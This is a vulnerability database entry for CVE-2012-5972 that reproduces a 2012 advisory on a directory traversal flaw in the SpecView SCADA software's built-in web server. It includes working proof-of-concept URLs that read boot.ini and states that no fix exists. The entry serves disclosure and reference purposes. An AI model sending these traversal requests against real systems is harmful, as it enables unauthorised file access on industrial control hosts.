Details of VAR-E-201206-0434

ID

VAR-E-201206-0434

CVE

cve_id:

CVE-2012-5972

Trust: 1.6

sources: EXPLOIT-DB: 19455 // EDBNET: 41655

EDB ID

19455

TITLE

specview 2.5 build 853 - Directory Traversal - Windows webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 19455

DESCRIPTION

specview 2.5 build 853 - Directory Traversal. CVE-83396CVE-2012-5972 . webapps exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 19455

AFFECTED PRODUCTS

vendor:	specview	model:	build	scope:	eq	version:	2.5853	Trust: 1.0
vendor:	specview	model:	build	scope:	lte	version:	<=2.5853	Trust: 0.6

sources: EXPLOIT-DB: 19455 // EDBNET: 41655

EXPLOIT

#######################################################################

Luigi Auriemma

Application: SpecView
http://www.specview.com
Versions: <= 2.5 build 853
Platforms: Windows
Bug: web server directory traversal
Exploitation: remote
Date: 29 Jun 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

SpecView is an easy to use SCADA software.

#######################################################################

======
2) Bug
======

The software has an option (disabled by default) that allows to run a
web server for providing an updated screenshot of the program.
This built-in web server is affected by a classical directory
traversal attack through the usage of more than two dots.

#######################################################################

===========
3) The Code
===========

http://SERVER/.../.../.../.../.../.../boot.ini
http://SERVER/...\...\...\...\...\...\boot.ini

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Trust: 1.0

sources: EXPLOIT-DB: 19455

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 19455

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 19455

TYPE

Directory Traversal

Trust: 1.6

sources: EXPLOIT-DB: 19455 // EDBNET: 41655

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 19455

EXTERNAL IDS

db:	NVD	id:	CVE-2012-5972	Trust: 1.6
db:	EXPLOIT-DB	id:	19455	Trust: 1.6
db:	EDBNET	id:	41655	Trust: 0.6

sources: EXPLOIT-DB: 19455 // EDBNET: 41655

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2012-5972	Trust: 1.6
url:	https://www.exploit-db.com/exploits/19455/	Trust: 0.6

sources: EXPLOIT-DB: 19455 // EDBNET: 41655

SOURCES

db:	EXPLOIT-DB	id:	19455
db:	EDBNET	id:	41655

LAST UPDATE DATE

2022-07-27T09:49:57.305000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	19455	date:	2012-06-29T00:00:00
db:	EDBNET	id:	41655	date:	2012-06-29T00:00:00